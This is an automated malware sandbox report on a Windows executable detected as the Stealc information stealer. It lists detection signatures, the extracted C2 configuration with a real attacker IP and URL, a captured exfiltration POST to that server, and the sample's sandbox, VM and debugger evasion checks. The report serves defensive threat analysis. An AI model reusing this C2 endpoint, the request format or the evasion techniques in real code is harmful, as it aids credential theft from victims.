Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1546221
MD5:	9ee120f9536a150c01a708c545dfe737
SHA1:	e09dd49e147b47b6234a1cceba6c7c1f46cfe562
SHA256:	d3cbd6a1899c35e285104442edb74f93eb064d01aff39df137f66fed9448619d
Tags:	exeuser-Bitsight
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create guard pages, often used to hinder reverse usering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected potential crypto function

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Program does not show much activity (idle)

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 3136 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9EE120F9536A150C01A708C545DFE737)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2184845455.00000000005F1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.2143190137.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2189856639.0000000000F48000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 3136	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 3136	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.5f0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T16:35:16.648870+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.6	49752	TCP
2024-10-31T16:35:55.098627+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.6	49941	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-31T16:35:02.626849+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49710	185.215.113.206	80	TCP

Code function: 0_2_005F62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_005F62D0

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIIIECBGDHJJKFIDAKJDHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 45 30 41 44 32 45 34 43 36 37 42 31 39 35 33 34 34 38 30 31 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 44 2d 2d 0d 0a Data Ascii: ------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="hwid"8E0AD2E4C67B1953448019------GIIIECBGDHJJKFIDAKJDContent-Disposition: form-data; name="build"tale------GIIIECBGDHJJKFIDAKJD--

Source: file.exe, 00000000.00000002.2189856639.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2189856639.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2189856639.0000000000F75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php%
Source: file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpM
Source: file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpU
Source: file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpd
Source: file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpe
Source: file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpy
Source: file.exe, 00000000.00000002.2189856639.0000000000F89000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
Source: file.exe, file.exe, 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2143190137.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088	0_2_00A40088
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A4F0D3	0_2_00A4F0D3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00630098	0_2_00630098
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00622138	0_2_00622138
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0064B198	0_2_0064B198
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0065E258	0_2_0065E258
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00634288	0_2_00634288
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0067B308	0_2_0067B308
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066D39E	0_2_0066D39E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3935D	0_2_00A3935D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A3E497	0_2_00A3E497
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009414CB	0_2_009414CB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00614573	0_2_00614573
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0061E544	0_2_0061E544
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006345A8	0_2_006345A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0065D5A8	0_2_0065D5A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A43547	0_2_00A43547
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066A648	0_2_0066A648
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006796FD	0_2_006796FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006366C8	0_2_006366C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0064D720	0_2_0064D720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00666799	0_2_00666799
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00644868	0_2_00644868
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0065F8D6	0_2_0065F8D6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0064B8A8	0_2_0064B8A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_006498B8	0_2_006498B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009BC9F1	0_2_009BC9F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A46AAF	0_2_00A46AAF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A41A4C	0_2_00A41A4C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00658BD9	0_2_00658BD9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00664BA8	0_2_00664BA8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00939B4C	0_2_00939B4C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00660B88	0_2_00660B88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2FCA5	0_2_00B2FCA5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0066AC28	0_2_0066AC28
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0064BD68	0_2_0064BD68
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A4BDA9	0_2_00A4BDA9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00621D78	0_2_00621D78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009EBDAD	0_2_009EBDAD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0065AD38	0_2_0065AD38
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00644DC8	0_2_00644DC8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00645DB9	0_2_00645DB9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00638E78	0_2_00638E78
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00661EE8	0_2_00661EE8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A1BF74	0_2_00A1BF74

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 005F4610 appears 316 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: eqnrkxus ZLIB complexity 0.9945791657248343

Source: file.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00609790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00609790

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00603970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

0_2_00603970

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\OXLMX094.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 2137088 > 1048576

Source: file.exe

Static PE information: Raw size of eqnrkxus is bigger than: 0x100000 < 0x19ec00

Source:	Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2143190137.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2184845455.000000000061C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2143190137.0000000004BCB000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.5f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;eqnrkxus:EW;upizgxhc:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;eqnrkxus:EW;upizgxhc:EW;.taggant:EW;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00609BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00609BB0

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x21808e should be: 0x211e5a

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: eqnrkxus
Source: file.exe	Static PE information: section name: upizgxhc
Source: file.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009970BA push edx; mov dword ptr [esp], ebp	0_2_00997122
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009970BA push 6329159Ah; mov dword ptr [esp], ebx	0_2_0099713B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009970BA push esi; mov dword ptr [esp], eax	0_2_00997142
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009970BA push esi; mov dword ptr [esp], edx	0_2_009971D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push 7F273DDBh; mov dword ptr [esp], ecx	0_2_00A4012F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push 75537EC5h; mov dword ptr [esp], ebp	0_2_00A4019C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push 3E738F5Bh; mov dword ptr [esp], esi	0_2_00A401E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push edi; mov dword ptr [esp], 45FDA420h	0_2_00A401FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push edi; mov dword ptr [esp], 2714FD54h	0_2_00A40209
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push eax; mov dword ptr [esp], ebx	0_2_00A4027C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push ebx; mov dword ptr [esp], eax	0_2_00A40290
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push ecx; mov dword ptr [esp], edi	0_2_00A402A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push 4D2DFE8Dh; mov dword ptr [esp], ebx	0_2_00A402C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push ebp; mov dword ptr [esp], ecx	0_2_00A402E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push ecx; mov dword ptr [esp], 7F6B4E58h	0_2_00A4030A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push ebx; mov dword ptr [esp], 6E249511h	0_2_00A4039F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push eax; mov dword ptr [esp], ecx	0_2_00A404FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push eax; mov dword ptr [esp], esi	0_2_00A40567
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push edx; mov dword ptr [esp], ebx	0_2_00A405D2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push ecx; mov dword ptr [esp], 498E1DA8h	0_2_00A405F5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push 0512863Bh; mov dword ptr [esp], eax	0_2_00A4069E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push eax; mov dword ptr [esp], 116D7AC1h	0_2_00A40751
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push esi; mov dword ptr [esp], ecx	0_2_00A40778
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push ebx; mov dword ptr [esp], edx	0_2_00A407D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push esi; mov dword ptr [esp], edx	0_2_00A407EE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push 4BCE3352h; mov dword ptr [esp], edx	0_2_00A408D4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push 16A01DBAh; mov dword ptr [esp], ecx	0_2_00A40937
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push 11200062h; mov dword ptr [esp], ecx	0_2_00A40A15
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push 38354E00h; mov dword ptr [esp], edi	0_2_00A40A4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push 57682635h; mov dword ptr [esp], ecx	0_2_00A40ABA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A40088 push 770B4455h; mov dword ptr [esp], edx	0_2_00A40AD1

Source: file.exe

Static PE information: section name: eqnrkxus entropy: 7.953335707487061

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_00609BB0

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_0-37879

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8DE0F5 second address: 8DE0FE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A54C83 second address: A54C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007EFD08B70876h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007EFD08B70876h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A53D40 second address: A53D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A53D45 second address: A53D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A54573 second address: A54588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08D543FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A54588 second address: A545A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD08B70884h 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A565BB second address: A565BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A565BF second address: A565D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08B70885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A565D8 second address: A565DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A565DE second address: A565E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A56723 second address: A5672D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007EFD08D543FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A56834 second address: A56839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A56839 second address: A5687C instructions: 0x00000000 rdtsc 0x00000002 ja 00007EFD08D543F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jbe 00007EFD08D54404h 0x00000013 nop 0x00000014 mov dword ptr [ebp+122D2779h], eax 0x0000001a push 00000000h 0x0000001c mov edx, 6EA7AFA0h 0x00000021 push CE367323h 0x00000026 pushad 0x00000027 pushad 0x00000028 push edi 0x00000029 pop edi 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d jo 00007EFD08D543FCh 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A5687C second address: A568D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 add dword ptr [esp], 31C98D5Dh 0x0000000c mov dword ptr [ebp+122D55D1h], ebx 0x00000012 push 00000003h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007EFD08B70878h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edx, esi 0x00000030 push 00000000h 0x00000032 or dword ptr [ebp+122D1BD0h], eax 0x00000038 push 00000003h 0x0000003a push ecx 0x0000003b xor dword ptr [ebp+122D3456h], edx 0x00000041 pop edx 0x00000042 mov dword ptr [ebp+122D322Ch], ebx 0x00000048 push 9DDC411Fh 0x0000004d pushad 0x0000004e push ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A68AA6 second address: A68AC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFD08D54403h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A75AEA second address: A75B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD08B70886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007EFD08B70876h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A75ED8 second address: A75EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
